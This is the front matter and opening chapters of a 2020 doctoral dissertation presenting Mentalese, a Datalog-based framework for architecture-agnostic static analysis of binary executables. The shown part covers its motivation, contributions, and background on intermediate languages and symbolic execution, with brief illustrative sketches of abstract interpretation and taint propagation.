MENTALESE - An Architecture-Agnostic Analysis Framework for Binary Executables

Dissertation for the degree of Doktor-Ingenieur, submitted to the Faculty of Electrical Engineering and Information Technology at Ruhr-Universität Bochum

submitted by

Behrad Garmany, born in Maschhad

Bochum, November 2020

Referee: Prof. Dr. Thorsten Holz, Ruhr-Universität Bochum

Second referee: Prof. Dr. Konrad Rieck, Technische Universität Braunschweig

Date of the oral examination: 11 February 2021

Acknowledgements

I am deeply grateful to my advisor Prof. Dr. Thorsten Holz for his support, guidance, and patience. He gave me the chance to pursue my interests in binary analysis and reverse engineering, which have been the focus of my studies for the past years. I would also like to thank Prof. Dr. Konrad Rieck for spending his valuable time on the review of this work.

During my time at the chair of systems security, I had the chance and the pleasure to work with inspiring, collaborative, and hard-working people toward common research goals. In particular, I would like to mention Martin Stoffel, Robert Gawlik, Jannik Pewny, Moritz Contag, Philipp Koppe, Benjamin Kollenda, Andre Pawlowski, Tim Blazytko, and Sebastian Vogl. Special thanks go to Jannik Pewny, who spent his precious time presenting our paper at the 34th Annual Computer Security Applications Conference while I was unable to travel, even though he was not among the authors. Additionally, I would like to thank Cornelius Aschermann for inspiring talks and brainstorming discussions, as well as for continually reminding me to keep going. I would also like to thank all other students with whom I had a great time during my years at the chair.

I want to express my gratitude to my friends Carsten Willems, Johannes Dahse, and Felix Schuster for their continuous support and encouragement to not lose track. My deepest gratitude goes to my parents and my sister for their unconditional love and support over all the years, encouraging me to pursue my passion. In the past three years I have had the greatest luck to spend my life with my fiancée Verena, who stood by my side and supported me in all my decisions.

Abstract

Static program analysis enables us to reason about program behavior and its semantic properties without actually running the program. It enjoys a wealth of achievements based on decades of research. Unfortunately, it comes with some unpleasant computational drawbacks that stem from the fact that almost any interesting property to reason about is undecidable. The research presented in this thesis tackles a niche in the sector of program analysis that deals with binary programs. At the end of each translation pipeline, it is the binary that is executed. Naturally, binary program analysis is the only choice when source code is not available. While it poses additional challenges that increase the complexity and give rise to more undecidable problems to deal with, it also has some pleasant properties that aid the analysis. Syntactic edge cases and language features, for instance, are in a sense canonicalized, and many modules of a program are compiled into a single binary. The Internet of Things era has given rise to high competition among companies, which has induced the use of commercial third-party software that is usually shipped in binary form. A popular trend in third-party code reuse incorporates more and more open source software, which comes with risk. This era creates additional interest in architecture-agnostic tools that aid the process of cross-architecture binary analysis. Similar to the interest in source code analyzers that aim to cover many languages, our interest concentrates on covering many architectures. This brings us to the first problem to be tackled (aside from disassembly and control flow recovery): the choice of a proper intermediate language (IL). Ideally, the IL covers many architectures, has a small semantic footprint (a small instruction set), and allows developing generic analyses that can be applied to all architectures.
This thesis introduces Mentalese (language of thought), a framework for architecture-agnostic analysis. The name is inspired by the philosophical hypothesis that assumes a language in which processes of thought take place. The way we approached binary analysis resembles this process in many ways. In this work, we discuss our early steps to find a suitable IL and specify the design and the choices we made to build a framework that adds value to the field of binary analysis. Mentalese is designed to be scalable, flexible, accessible, and extensible. Based on our prototype, we have developed tools that aid in the process of exploitation, cross-architecture bug search, and bug detection.

Zusammenfassung

Static code analysis makes it possible to derive statements about a program's behavior and its semantic properties without actually executing the program. The field enjoys a wealth of achievements based on decades of research. Unfortunately, static analysis is tied to the classic problem of undecidability, since almost every interesting property we ask about is a non-trivial semantic property, and the laws of computability do not permit a program that can prove such a property for all programs. The research presented in this dissertation occupies a niche in the area of static program analysis whose application focuses on binary (executable) programs. At the end of the source code's translation pipeline, it is the binary that is executed on the respective machine. If the source code is not available, binary analysis remains the only choice. This confronts the analysis with additional challenges, which we discuss in this work. However, analysis at the binary level also has advantages: syntactic structures and language features are canonicalized at the machine level, and many source code modules are translated into a single executable file, so that the program can be analyzed in its overall context. The era of the Internet of Things (IoT) has led to increased competition between companies, which increasingly induces the use of commercial third-party software. Such software is usually shipped as executable binaries. A popular trend in the reuse of third-party code increasingly involves the inclusion of open source software, which is not without risk. The consequence is a need for architecture-agnostic tools that enable the process of cross-architecture binary analysis.
Analogous to the trend of commercial source code analyzers, which cover as broad a spectrum of programming languages as possible, we pursue the goal of covering as many architectures as possible. This leads us to our first problem, which, besides the process of disassembling and recovering the control flow, puts the choice of a suitable intermediate language (IL) in the foreground. Ideally, the IL covers many architectures, has a small instruction set, and enables the development of generic analyses that can be applied to all architectures. Previous approaches in binary analysis research fail in terms of scalability and stability. This dissertation deals with our prototypical implementation of Mentalese (language of thought), a framework for architecture-agnostic analysis of executable programs. The name derives from the philosophical hypothesis that assumes a language in which processes of thought take place. The way we approach the problems of binary analysis resembles this process in many respects. This declarative way of problem solving is one of the concepts of Mentalese. Mentalese is designed to be scalable, flexible, and easily extensible. Based on this framework, we have developed tools that support the exploitation process, enable cross-architecture bug search, and detect bugs.

Contents

List of Figures xiii

List of Tables xv

List of Abbreviations xvii

1 Introduction 1
  1.1 Binary Landscape ...... 3
  1.2 Challenges ...... 4
  1.3 Contributions ...... 5

2 Foundations 9
  2.1 The VEX Intermediate Language ...... 11
  2.2 Symbolic Execution: Steps with VEX ...... 14
    2.2.1 Cross-Architecture Basic Block Semantics ...... 17
    2.2.2 Path Extraction for Dynamic Hooks ...... 21
  2.3 A suitable IL ...... 22
    2.3.1 Dataflow Essentials ...... 26
    2.3.2 Static Single Assignment ...... 28

3 Mentalese - A Binary Analysis Framework 37
  3.1 From Datalog to Binary Analysis ...... 38
    3.1.1 Datalog ...... 39
    3.1.2 Knowledgebase: A Mental-IR ...... 41
  3.2 Overview ...... 44
  3.3 Frontend ...... 47
    3.3.1 Stack Normalization ...... 48
    3.3.2 SymIL Extensions ...... 50
    3.3.3 Scopes ...... 51
  3.4 Backend ...... 54
    3.4.1 Transition Descriptors ...... 54
    3.4.2 Pointer Analysis ...... 57
    3.4.3 Flow-Sensitivity ...... 64


    3.4.4 Context-Sensitivity ...... 65
  3.5 Analysis Derivatives ...... 69
    3.5.1 Taint-Analysis ...... 69
    3.5.2 Value Propagation ...... 74
    3.5.3 Slicing ...... 75
  3.6 Experimental Study: Pointer Analysis ...... 77

4 Towards Automated Generation of Exploitation Primitives for Web Browsers 87
  4.1 Model and Assumptions ...... 89
  4.2 Design ...... 93
    4.2.1 Finding Sinks ...... 95
    4.2.2 Program Paths ...... 96
    4.2.3 Triggering Input ...... 102
    4.2.4 Implementation Details ...... 103
  4.3 Evaluation ...... 103
    4.3.1 Exploitation Primitive Trigger (EPT) ...... 103
    4.3.2 Fine Tuning ...... 106
  4.4 Discussion and Limitations ...... 106
  4.5 Related Work ...... 107
  4.6 Conclusion ...... 108

5 Static Detection of Uninitialized Stack Variables in Binary Code 109
  5.1 Uninitialized Stack Variables ...... 111
  5.2 Design and Approach ...... 113
    5.2.1 Safe Zones ...... 114
    5.2.2 Interprocedural Flow Analysis ...... 116
    5.2.3 Symbolic Execution ...... 118
    5.2.4 Implementation ...... 119
  5.3 Evaluation ...... 119
    5.3.1 CGC Test Corpus ...... 119
    5.3.2 Real-World Binaries ...... 120
  5.4 Discussion ...... 121
  5.5 Related Work ...... 124
  5.6 Conclusion ...... 126

6 Conclusion 127

Appendices

A JavaScript Code Corresponding to CVE-2016-9079 133

Publications 137

References 139

List of Figures

2.1 Excerpt of the VEX grammar taken from [147] ...... 13
2.2 IRSB for mov eax, [esp+18h] ...... 14
2.3 Overview of our architecture for symbolic execution and evaluation ...... 15
2.4 Execution using abstract environments ...... 16
2.5 x86 vs Armv7: Basic blocks representing the same lines of code and their corresponding summaries in S-Expression form ...... 20
2.6 Slice/Path extraction and output of Symbolic Execution ...... 23
2.7 SymIL Grammar ...... 25
2.8 ARM Code to SymIL ...... 26
2.9 Simple Worklist Algorithm ...... 27
2.10 Placement of φ-functions [63] ...... 31
2.11 Renaming IL-Expressions ...... 35

3.1 Syntax tree of zf_4 ← rax_2 + 2 == 0 and facts that represent it ...... 46
3.2 Highlevel Architecture of Mentalese ...... 47
3.3 x86-64 lifting ...... 48
3.4 Normalized stack for x86 architecture: a) The stack arrangement for a normalized stack. The initial stack pointer (sp) is not touched by the function's prologue. b) The rebased arrangement for a normalized stack ...... 50
3.5 Scopes: a) live definitions at the callsites to libssh2_list_add. b) Entry node of libssh2_list_add ...... 52
3.6 ARMv7 Thumbv2 and x86-64 assembly on the left side; corresponding SymIL on the right side ...... 53
3.7 Transition Descriptors ...... 56
3.8 Points-To Graph and its corresponding C program. Black edges are address-taken edges, blue edges are inclusion edges, red edges are propagation edges ...... 59
3.9 PtsTo specification: PtsTo(reg,disp,access,type,id,bb,order,ctx) ...... 60
3.10 Assembly code for the C code of Figure 3.8: the left listing shows x86-64 assembly, the right its Armv7 counterpart in Thumbv2 ...... 61
3.11 Pointer Analysis ...... 63


3.12 Extensions for Context-sensitivity ...... 68
3.13 Taint specification: Taint(reg, disp, color, taint_descr, bb, order, ctx) ...... 70
3.14 Rule Set: Extensions for Taint Analysis ...... 72
3.15 PtsTo and Taint output of the program presented in Figure 3.16 ...... 73
3.16 C routine and its x86-64 assembly code (O0) ...... 76
3.17 Number of Points-To facts for Binutils and nginx in relation to k-sensitivity and flow sensitivity. With fs we denote the partial flow-sensitivity + reaching definition. With nfs we refer to its counterpart without reaching definition ...... 82
3.18 All matches of top-10 ranks. The upper matrix shows the results for x86-64, the lower matrix shows the results for Armv7. A score that does not make it into the top-10 is given a score of 0. O0 vs O0 and O2 vs O2 binaries are not matched for x86. Similarly, for ARMv7 the versions old vs old and new vs new are not matched ...... 85

4.1 Architecture implemented by PrimGen ...... 91
4.2 Rule Set: Tainted Sinks ...... 95
4.3 Taint Propagation Graph (TPG) of our running example: leaf nodes are attacker sinks ...... 97
4.4 Running example (CVE-2016-9079): Path generated from a control point at 0x107a00d4 into an indirect call sink. On the left side, the assembly code is shown which is executed along the path into the sink at 0x101c0cb8. The arrows indicate the mapping to a controlled memory region. Each generated path is associated with a memory map. All offsets are relative to the base address. Each memory map is transformed into a tree structure ...... 98
4.5 JS EPT excerpt ...... 102
4.6 Y-axis: Number of satisfiable paths which lead to an attacker sink; X-axis: Path length (number of basic blocks) ...... 104

5.1 Uninitialized use of a stack variable: On the left side the intraprocedural case, on the right side the interprocedural ...... 112
5.2 Architecture implemented by our prototype ...... 114
5.3 Sketch: Computation of Safe Zones ...... 116
5.4 Graphical representation of labeling safe edges ...... 117

List of Tables

3.1 EDB-Facts that get extracted from a binary ...... 45
3.2 Transition-events ...... 54
3.3 GNU Coreutils v8.32 (O0 compilation): Number of facts ...... 78
3.4 Number of facts for Binutils v2.35 and nginx v1.17.9 ...... 78
3.5 Pointer Analysis performance: O0/O2 seconds in relation to k-sensitivity and flow-sensitivity. FS-RD denotes partial flow sensitivity (FS) without a reaching definition analysis (RD) for stack variables. For missing values, the analysis ran out of RAM ...... 79
3.6 Reduction in the number of Memory-facts from O0 to O2 for x86-64 ...... 79
3.7 Ranks 1 and 2 of matches compiled for x86-64: Binutils are in v2.35, Coreutils in v8.32, and nginx in v1.17.9. Binaries denoted with distro are taken from Ubuntu 18.04.4 LTS. Binutils-distro are in v2.30, and nginx-distro in v1.14.0 ...... 84
3.8 Ranks 1 and 2 of matches for ARMv7 (EABI LE): Binutils v2.25 vs v2.34 and Coreutils v8.23 vs v8.32. If the matching score between two versions of the same program is not in the top-2, its rank is given explicitly ...... 86

4.1 Overview of the affected CVEs and our analysis results: The fourth column shows the number of alternative exploit primitives (sinks) denoted as EIP/WWW/WrW. The fifth column shows the number of satisfiable paths which lead to the attacker sinks. Among these paths, PrimGen generated EPTs, listed in the sixth column. The seventh column lists the number of attacker sinks we cover through EPTs, denoted in the same fashion as in the fourth column. The eighth column depicts whether the original PoC sink is triggered by any of our inputs. The last column shows the verification time in minutes for satisfiable paths ...... 105
4.2 Taint analysis results for case studies. The third column lists the number of reachable functions from the control point. The fourth column shows the number of functions which operate on controlled data. The last column lists the timings (in seconds) for the taint analysis ...... 105


5.1 Analysis results for the relevant CGC binaries that contain an uninitialized memory vulnerability ...... 122
5.2 Analysis results for binutils-2.30, ImageMagick-6.0.8, and gnuplot 5.2 patchlevel 4. The number in parentheses denotes the number of verified bugs ...... 122

List of Abbreviations

AST ...... Abstract Syntax Tree
CBD ...... Component-based Development
CDG ...... Control Dependence Graph
CFG ...... Control Flow Graph
CGC ...... Cyber Grand Challenge
CPG ...... Code Property Graph
DDG ...... Data Dependency Graph
DU ...... Definition Use or Def-Use
EDB ...... Extensional Database (Datalog)
EIP ...... Extended Instruction Pointer
EPT ...... Exploitation Primitive Trigger
ICFG ..... Interprocedural Control Flow Graph
IDB ...... Intensional Database (Datalog)
IL ...... Intermediate Language
IR ...... Intermediate Representation
IoT ...... Internet of Things
PDG ...... Program Dependence Graph
PoC ...... Proof of Concept
RE ...... Reverse Engineering
SDG ...... System Dependence Graph
SMT ...... Satisfiability Modulo Theories
SSA ...... Static Single Assignment
SPD ...... Stack Pointer Delta
TCG ...... Tiny Code Generator
TPG ...... Taint Propagation Graph


UD ...... Use Definition or Use-Def
VUT ...... Vulnerability Test Case
WrW ..... Write-Where
WWW .... Write-What-Where

1 Introduction

Contents

1.1 Binary Landscape ...... 3
1.2 Challenges ...... 4
1.3 Contributions ...... 5

Software drives and dominates almost every aspect of our global and personal life. With the Internet of Things revolution, almost every electronic device earns its intelligent trademark, driven by more and more complex software. The problem gains traction as these devices communicate with each other, opening gates to interact with a huge input space. How can we be sure that the software does what it was intended to do? Moreover, how can we reason about its behavior and make assumptions about bad states that it might reach? This is a classic problem of program analysis, a field that enjoys achievements based on decades of research. A cornerstone among these achievements is known under the term static analysis. Static program analysis aims to provide the instruments to reason about program behavior and its semantic properties without actually running the program on specific inputs. This stands in contrast to dynamic approaches, which actually run the program and, at the time of this writing, are experiencing a blossoming period, mainly driven by the trends pushed by fuzzing research. It almost seems that the classic roles of the last decade have switched: static analysis used to be slow, and dynamic analysis was fast and rather simple. But right now we are witnessing a trend in the opposite direction, where dynamic analyzers are slow and are driven by information from static analyzers

that are fast. These observations, among others that we discuss in this chapter, are the driving force of this work. One of the advantages of static analyzers postulated by traditional literature is coverage, i.e., reasoning about all program executions. In this sense, static analysis is a more comprehensive approach than dynamic analysis. However, what we value most is the capability of static analysis to start from any program point and drive the analysis from that point. This concept is used in Chapter 4, where we approach a static taint analysis starting from arbitrary locations. Unfortunately, static analysis comes with some unpleasant computational drawbacks, as we need to come to terms with the fact that almost all interesting problems are undecidable, stemming from the property that the halting problem can be reduced to them. In fact, by Rice's theorem, we know that we cannot build an algorithm that can give us a desired answer about any non-trivial semantic property for all programs. Although the landscape looks demotivating, it does not mean that we are running against a wall. The traditional approach is to accept some imprecision and set aside the "all" aspect of the theorem. To defy the halting problem and sidestep the undecidable nature of static analysis [120], static analysis techniques use approximations. The core concept is abstraction. In terms of the more general foundation given by the perspective of abstract interpretation [55], this means that we look at specific properties in each statement and put a filter on these statements which eliminates certain details, yet retains enough key information about properties of interest, such as the sign or the integer range. These abstractions are also referred to as abstract elements.
The program is basically dismantled with respect to these abstractions and transformed into a simpler abstract domain, where the program is executed by the abstract transformers of the domain. These transformers describe the operational semantics of the domain, i.e., how the program is executed, mimicking the concrete execution with respect to the abstract properties. This execution has to be a sound over-approximation of the concrete semantics. In particular, this means that if we start at an abstract state s0#, execute the program in the abstract domain, and concretize its output, we get a set of states that is a superset of the states reached by all concrete executions that start at the concrete state s0¹. Usually, an abstract state represents a superset of concrete states, and we are executing a collection of these states. In other words, the concrete set of states is a subset of the concretized abstract states. Intuitively, this also means loss of precision, and loss of precision is the main reason for false positives.
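To make the abstraction idea tangible, the following sketch interprets integer addition over a simple sign domain. The domain, the abstract transformer, and all names are illustrative inventions for this example; they are not part of Mentalese or any particular framework.

```python
# A minimal sketch of abstract interpretation over a sign domain.
NEG, ZERO, POS, TOP = "-", "0", "+", "T"   # TOP means "any sign"

def alpha(n):
    """Abstraction: map a concrete integer to its abstract sign."""
    if n < 0:
        return NEG
    return ZERO if n == 0 else POS

def abs_add(a, b):
    """Abstract transformer for '+': a sound over-approximation of
    concrete addition. Whenever the operands' signs do not determine
    the result's sign, we must answer TOP."""
    if a == ZERO:
        return b
    if b == ZERO:
        return a
    if a == b:                 # (-)+(-) = -, (+)+(+) = +
        return a
    return TOP                 # e.g. (+)+(-) could be -, 0, or +

# Soundness check on samples: the abstraction of the concrete result
# must be covered by the abstract result (equal to it, or TOP).
for x in range(-3, 4):
    for y in range(-3, 4):
        abstract = abs_add(alpha(x), alpha(y))
        assert abstract == TOP or abstract == alpha(x + y)

print(abs_add(POS, POS))   # +
print(abs_add(POS, NEG))   # T  (precision loss: a source of false positives)
```

The TOP answer for (+)+(-) is exactly the loss of precision discussed above: the abstract execution stays sound by covering every concrete outcome, at the cost of forgetting which one occurs.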

¹ The concrete counterpart of s0#.

1.1 Binary Landscape

Binary code analysis is highly related to the process of Reverse Engineering (RE). Originally introduced with respect to hardware devices, the term is nowadays often related to software. With RE comes the capability to reconstruct, identify, and map details about the software into a higher level of abstraction, details which are lost or obscured during the translation into machine code. This makes RE an invaluable application in the process of binary analysis. Another term often related to binary analysis is disassembly. A so-called disassembler takes the binary and translates the machine code into assembly code. This is often the first step in the process of the analysis. One of the driving forces behind binary analysis is malware, which comes with great versatility and takes different forms, such as classical viruses, worms, Trojan horses, spyware, browser and database extensions, or even games. Some of these try to resist reverse engineering by utilizing obfuscation techniques [149, 128, 53]. Here, binary analysis aids both ways: it helps either in the process of reverse engineering (deobfuscation) or in the process of obfuscation itself. The latter case is, aside from malware, interesting for intellectual property protection. The analysis of binary code is critical when source code is not available. In some cases the source code might even be lost, leaving binary analysis as the only option to deal with the code. But even in the presence of source code, binary code analysis is essential, because at the end of the translation pipeline of any source code, it is the binary code that runs on the bare metal. Does this code have the same semantics as the higher-level code? This question arises from the "what you see is not what you execute" aspect of the translation process. Source code might not be reflected semantically equivalently in what is executed on the machine code level.
Aggressive optimization procedures can change the semantics or even produce incorrect code. Coming with a huge and complex code base, compilers can become a cumbersome companion of trust in the process of software development. Yang et al., for instance, found over 300 bugs in compilers using synthesized C programs, some of which led to the emission of incorrect code [214]. We know that compilers can also optimize checks away. Many of these problems arise from undefined behavior, where the compiler has the freedom to do what it wants for the sake of producing efficient code. These optimizations have sparked debates in the recent past between practitioners and compiler writers. With the cloud as a platform for software development, it is not inconceivable that malicious compilers are installed on the system. A malicious compiler pass might emit backdoors or vulnerabilities that are triggered when a certain CPU or memory state is reached. The Internet of Things (IoT) era has given rise to high competition among companies. This pressure enforces the use of commercial third-party software, which is usually shipped in binary form. According to a study by VDC Research [83], around 40 percent of developers in the embedded field report delays in shipment. To overcome such delays, more and more third-party software is incorporated. Component-based development (CBD) is a common strategy in software engineering to boost productivity and control. It has become common practice in modern software development to incorporate multiple modules from different vendors to compose a software system. The trend also goes toward utilizing open source software, which can be seen as an external supplier and comes with risk. Most vendors of commercial software follow a closed source policy, which leaves the consumer to either trust the shipped binaries or perform audits on the machine code level.

1.2 Challenges

Performing static program analysis on the binary level poses additional challenges and increases the complexity of the analysis techniques we briefly described previously. Typical difficulties are, for example, the lack of symbol names and the loss of information about data structures. As the processor operates on integer and float values, all complex data structures are mapped onto these atomic datatypes. Additionally, knowledge about the hardware (e.g., the underlying instruction set architecture) is necessary to understand both the code and the data. Furthermore, the disassembly problem, as a non-trivial semantic property, is known to be undecidable in the general case [38, 100]. These problems make it challenging to achieve soundness, as we cannot reason about all possible executions. Making safe/conservative assumptions can become a burden for 1) scalability and 2) precision. For this reason, many bug hunting tools and commercial analyzers are neither sound nor complete. But besides the challenges, analysis on the binary level also comes with benefits. Large source code bases with billions of lines of code are certainly not a landscape in which static analyzers perform well; in such code bases it is unclear which modules interact and which are destined to be compiled into the binary. At the end of the pipeline, all modules are linked into a single binary, which lets us analyze the program in its purposed context. The binary level is the lingua franca between program and CPU. As such, it can also be seen as a communication layer that canonicalizes

syntactic constructs. For instance, a field access in a struct can be realized as p->fld or (*p).fld. Such equivalent constructs are abstracted away on the binary level, and an analyzer does not need to cope with them. Analysis of binary code is typically done by lifting the disassembly to an intermediate language (IL). This approach simplifies the analysis task, since we work with a small number of expressions compared to the tremendous number of instructions present, for instance, in Intel's x86-64 architecture. For example, many instructions implicitly change the state of registers: an x86 add instruction performs an addition and changes the state of the flags register; a push instruction pushes data onto the stack and changes the stack pointer. IL frameworks have to account for these implicit state changes, which are often stated explicitly in their specific language. Lifting binaries to an IL is not a trivial task, especially for complex instruction set architectures. Recent research has favored the VEX intermediate representation of the Valgrind framework [158, 191, 181]. VEX is a popular choice in the binary analysis community for many analysis frameworks, either as their main IL or as a base from which to lift to another, higher-level IL [30, 188].
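As a toy illustration of such explicit state changes, consider lifting a single x86 add into a made-up three-address IL in which every implicit flag update appears as its own statement. The IL syntax and the helper below are invented for this sketch; they do not reflect VEX or SymIL.

```python
# Sketch: lift "add dst, src" into an invented IL where the implicit
# x86 flag updates become explicit statements. Not VEX/SymIL syntax.

def lift_add(dst, src):
    """Return explicit IL statements for a 32-bit 'add dst, src'."""
    return [
        f"t0 = {dst} + {src}",      # the addition itself
        "zf = (t0 == 0)",           # zero flag made explicit
        "sf = (t0 >> 31) & 1",      # sign flag made explicit
        f"cf = (t0 <u {dst})",      # carry flag: unsigned wrap-around
        f"{dst} = t0",              # write-back of the result
    ]

for stmt in lift_add("eax", "ebx"):
    print(stmt)
```

One machine instruction thus expands into several IL statements, but an analysis only ever has to understand the small set of IL operators, not the full x86 instruction set.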

1.3 Contributions

The research presented in this work tackles a niche in the sector of program analysis that deals with binary programs. When we started, the landscape did not offer any frameworks or tools, besides some commercial gold standards, that gave us stable ground to build and prototype ideas at scale. By now, things look better, with tools besides IDA Pro, such as Ghidra, Binary Ninja, and Angr, which expose a rich API and bring a fresh breeze into the field. However, when building program analysis tools, we need to start with the basics in a bottom-up manner, that is, by developing the building blocks. Although many modern disassemblers and CFG reconstruction tools use sophisticated analysis techniques to give us ground to work on, they do not allow us to tap into the algorithms or use them for our own needs. Basics like reaching-definitions analysis, dominator relations, and dominance frontiers are important building blocks. Another important technique is the conversion to static single assignment form (SSA), whose steps in the different stages of its algorithm [63] can, as we see in the next chapter, give us valuable information for building analysis algorithms. When we started to work on simple dataflow problems, we realized that we were concentrating more on the design of the algorithm, its arrangements, and the properties that need to be fulfilled to reach a fixpoint, rather than on the problem itself. Each building block needed some mechanism of communication to make its information accessible to other building blocks. The process became an error-prone and annoying task that we strived to avoid. In this work, our aim is a generic, architecture-agnostic and, most importantly, scalable and accessible framework that provides common ground for building analysis algorithms. One of our goals is flexibility, giving us a powerful instrument to build analysis tools that target binary executables.

The framework we present in this work is called Mentalese (language of thought). The name is inspired by the philosophical hypothesis that assumes a language in which processes of thought take place [78]. This language is called mentalese and is described as a language with a compositional structure; the meaning of complex representations results from the sum of all the parts that contribute to the meaning. The way we approached binary analysis resembles this process in many ways. In fact, the declarative, Datalog-based approach of our framework mimics this nature: certain facts that represent a property are combined with other facts to derive a new fact. These facts sum up to build a new meaning in the form of derived facts, extending the mental image of the program under analysis. As we see in Chapter 3, a declarative, compositionally structured arrangement gives us a flexible instrument and, more importantly, allows us to focus on the problem.
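This style of derivation can be pictured with a small sketch: a single taint-propagation rule, tainted(Y) :- tainted(X), assign(Y, X), evaluated bottom-up until a fixpoint is reached. The predicate names and facts below are invented for illustration and are not Mentalese's actual fact schema.

```python
# Hedged sketch of Datalog-style derivation: a taint rule
#   tainted(Y) :- tainted(X), assign(Y, X).
# evaluated naively to a fixpoint over a handful of invented facts.

assign = {("b", "a"), ("c", "b"), ("d", "c"), ("e", "z")}  # EDB facts: Y := X
tainted = {"a"}                                            # seed fact

changed = True
while changed:                        # naive bottom-up evaluation
    changed = False
    for y, x in assign:
        if x in tainted and y not in tainted:
            tainted.add(y)            # newly derived (IDB) fact
            changed = True

print(sorted(tainted))   # ['a', 'b', 'c', 'd']  -- 'e' copies untainted 'z'
```

Each loop iteration combines existing facts to derive new ones, exactly the compositional build-up of meaning described above; real Datalog engines evaluate such rules far more efficiently (e.g., semi-naively), but the fixpoint result is the same.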

In summary, we make the following contributions.

Chapter 2: Foundations

In this chapter, we describe the foundation of our framework: the IL it builds on and how we adapt and use standard techniques for our purposes. The chapter describes the problems we faced in the early stages with VEX-IR and how these problems motivated us to follow a road that turned into the development of Mentalese. Published papers that are based on this work are:

1. Dynamic Hooks: Hiding Control Flow Changes within Non-Control Data [207]

2. Cross-Architecture Bug Search in Binary Executables [158]

The first work uses our early achievements to extract and derive program paths that trigger a dynamic hook. The paper was published at the USENIX Security Symposium 2014 in joint work with Vogl, Gawlik, Kittel, Pfoh, Eckert, and Holz.

The second publication uses extensions of our framework to build semantic basic block summaries. The core idea is to find buggy signatures across different binaries for different architectures. Given the control flow graph (CFG) of each function of the program, we lift each basic block to an IR and transform each instruction of the block into a formula. Based on these formulas, sampling is performed and locality-sensitive hashing is applied to the sampled I/O pairs. These pairs give us a similarity metric. Our approach and the corresponding experiments were published at the IEEE Symposium on Security and Privacy 2015 in joint work with Pewny, Rossow, Gawlik, and Holz.

Chapter 3: Mentalese - A Binary Analysis Framework

This chapter describes the motivation, concepts and design of Mentalese. It addresses details about our design choices that were incorporated into our IR, as well as details about the pipeline on how the binary is processed. This chapter builds the foundation for the rest of the chapters.

Chapter 4: Towards Automated Generation of Exploitation Primitives for Web Browsers

This chapter evaluates a technique to automatically derive exploitation primitives. The targets we chose were web browsers, as we found the problem in these scenarios particularly interesting. Furthermore, we wanted to take on the challenge and try our tools on browsers, as these are not usual targets. The motivation here is that a crash does not necessarily put us in an exploitable state. Given a vulnerability trigger and a control point, the goal is to drive the execution into exploitation primitives and determine suitable values for JavaScript field objects that satisfy the paths that lead to the primitive. The chapter describes the design of a tool that builds on Mentalese. This work was published at the 34th Annual Computer Security Applications Conference (ACSAC 2018) [79] and was achieved in collaboration with my co-authors Stoffel, Gawlik, Koppe, Blazytko, and Holz.

Chapter 5: Static Detection of Uninitialized Stack Variables in Binary Code

One of the classic undecidable static analysis problems comes with the use of uninitialized variables. In this chapter we describe the design of a framework that builds on Mentalese to tackle the problem for binary executables. We published this work at the 24th European Symposium on Research in Computer Security (ESORICS 2019) [80] together with my co-authors Stoffel, Gawlik, and Holz.

2 Foundations

Contents

2.1 The VEX Intermediate Language ...... 11
2.2 Symbolic Execution: Steps with VEX ...... 14
2.2.1 Cross-Architecture Basic Block Semantics ...... 17
2.2.2 Path Extraction for Dynamic Hooks ...... 21
2.3 A suitable IL ...... 22
2.3.1 Dataflow Essentials ...... 26
2.3.2 Static Single Assignment ...... 28

In this chapter, we lay the foundation for our analysis framework. We start with a journey through our first steps with symbolic execution of binary executables, at a time when no frameworks were available to face the problems we wanted to address. We describe how our implementation evolved to become a valuable building block for several publications. At the end of this chapter, we describe the lessons we learned and why they motivated us to develop Mentalese.

The previous chapter gave us an overview of the problems of static analysis, in particular concerning binary code. Modern architectures offer a rich and complex set of instructions. On x86, for instance, the number of instructions is on the order of thousands. A static analysis that needs to reason about the execution of a program faces the problem of modeling its operational semantics in accordance with these instructions. Building a static analysis directly on top of these instructions is a cumbersome task, especially in the presence of multiple architectures. This complexity has given rise to a typical approach: lifting the binary code to an IL. Ideally, this language has few instructions. The number of instructions is crucial because it can blow up the lifted code, as a single CPU instruction might require several IL instructions for a semantically equivalent lifting. Once the binary is lifted, the analysis proceeds on the IL rather than the binary. This comes with several advantages:

• Analyzers deal with fewer instructions.

• By design, it eases the application of program analysis techniques. Modern compilers transform the source code to an intermediate representation (IR) to perform optimizations before the code is emitted as machine code.

• Analyzers can be applied to binary code in an architecture-agnostic fashion.

However, a shortcoming, though incurred only once, is the mapping and semantically equivalent modeling of native instructions in the IL. Considering the side effects of some instructions and the fact that the IL needs to semantically reflect the native instructions, we again run into a non-trivial and cumbersome task. Assuming that the purpose of the IL is not execution, e.g., being JIT-compiled or interpreted, an approach to tackle this problem is to incrementally add semantics to the IL when needed. For instance, we might skip the effects the instructions have on flags and add them when the necessity arises for the analysis. This approach requires a flexible framework that can handle incremental improvements of its IL without breaking prior analyses. Furthermore, the framework should allow a transparent integration of new language expressions which interact with the present set of expressions. The search for a proper IL blossomed with the revival of symbolic execution. Proposed in the 70s [25, 116], it gained interest with faster, more powerful hardware resources and advancements in the field of SMT solvers. Systems like CUTE, DART, and SAGE [179, 85, 86] built up the foundation for future research. In 2008, KLEE was introduced, an LLVM-based symbolic execution engine that evolved into the state-of-the-art engine for source-level symbolic execution. In order to use KLEE for binary purposes, a system called S2E was introduced in 2011. S2E is the first and only system available that allows one to symbolically execute a whole operating system. Strategies like selective symbolic execution are introduced, which allow one to select areas of code that undergo symbolic execution. S2E is based on QEMU [18], a state-of-the-art emulator. The core of the emulation process is the TCG (Tiny Code Generator), which translates guest instructions to host instructions. In doing so, the TCG generates its own IL instructions, performs optimizations on them, and translates them into host machine code. S2E intercepts this process by lifting the TCG-IL into LLVM and passing the resulting LLVM bitcode to KLEE. The heavyweight strength of S2E also comes with a lot of complexity, making the system not easy to handle and adapt to changes. In fact, it relies on old versions of QEMU and LLVM. Prior to S2E, the first systems on the binary level made their debut with BitBlaze and BAP [30, 188]. The former is built on top of the VEX IR. VEX is a RISC-like load-and-store language designed for dynamic binary instrumentation. It is part of the renowned Valgrind framework [152, 151]. The design is focused on dynamic analysis. However, due to the cumbersome task of designing, implementing, and lifting binary code to an IR, VEX is chosen by many systems. Its support for multiple architectures makes it particularly attractive. Lifters are available for MIPS, ARM, PPC, and x86, in both 32 and 64-bit variants. Valgrind itself does not return the IR it generates, as it is set up to translate from machine code back to machine code, using the IR as a layer to perform instrumentation and analysis. Furthermore, information about side effects of instructions that affect the processor flags is handled internally by helper functions and is not expressed explicitly through the IL. BitBlaze further lifts the VEX-IR to the Vine-IL, expressing the flags explicitly. Inspired by the Vine-IL, BAP (Binary Analysis Platform) introduces BIL but avoids the VEX pipeline. Mayhem [39], the winner of 